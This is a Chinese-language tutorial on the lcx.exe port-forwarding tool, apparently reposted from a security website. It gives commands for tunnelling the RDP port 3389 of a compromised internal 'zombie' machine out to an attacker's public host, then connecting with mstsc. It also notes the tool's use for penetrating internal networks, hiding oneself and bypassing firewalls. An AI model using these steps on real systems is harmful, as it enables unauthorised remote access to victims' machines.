1. 首页
  2. 网络安全教程

lcx.exe简单端口转发教程

端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。

这里我就用工具是Lcx,Lcx.exe是一个端口转发工具,相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于链接A机的3389端口。Lcx程序多用于被控制计算机(肉鸡)处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登陆到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等程序进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。

在目标机器上执行lcx.exe -slave 公网ip 端口 内网ip 端口

例如:lcx.exe –slave 154.223.*.* 51 192.168.*.* 3389 将内网的3389端口转发到公网的51端口

lcx.exe简单端口转发教程

然后在公网的机器上:Lcx.exe –listen 监听51端口,转发到公网机器的3389端口

例如:Lcx.exe –listen 51 3389

lcx.exe简单端口转发教程

这个时候已经将内网的3389转发到了公网机器的3389端口,我们在本地机器上远程公网IP 3389 ,就连接上了内网机器的3389,此时已经成功登陆进来,我们查看IP,可以看到是目标机器。

连接内网3389大致分为四部:

1:确定被控制计算机的内网ip

2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”

3:本机执行”lcx -listen 51 10000”

4:用mstsc 连接 “127.0.0.1:10000”

其他命令说明

端口转发:

Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>

Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>

端口映射:

Lcx -tran <等待连接的端口> <目标ip> <目标端口>

结语

Lcx可以用来渗透内网,也可以用来隐藏自己,还可以让不能访问外网的服务器访问外网,甚至可以用来绕过某些防火墙

文章来源:【安全时代】 原文链接:https://www.agesec.com/video/4475.html

安全时代全部内容仅适用于网络安全技术爱好者学习研究,学习中请遵循国家相关法律法规。

安全时代全部数据来源互联网,不代表安全时代立场,如侵犯您权益可邮箱联系我们,详情:版权纠纷

发表评论

电子邮件地址不会被公开。 必填项已用*标注